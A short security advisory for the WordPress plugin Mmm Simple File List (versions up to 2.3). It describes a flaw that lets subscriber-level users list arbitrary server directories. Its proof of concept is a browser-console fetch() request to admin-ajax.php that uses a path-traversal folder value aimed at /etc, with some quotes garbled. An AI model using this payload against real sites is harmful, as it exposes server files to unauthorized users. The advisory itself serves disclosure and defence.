Mmm Simple File List <= 2.3 - Subscriber+ Arbitrary Directory Listing

Description The plugin does not validate the generated path to list files from, allowing any authenticated users, such as subscribers, to list the content of arbitrary directories.

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=parse-media-shortcode&shortcode;=[MMFileList folder=“…/…/…/…/…/…/…/…/…/…/etc” format=“table” types"" headings=“”]’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));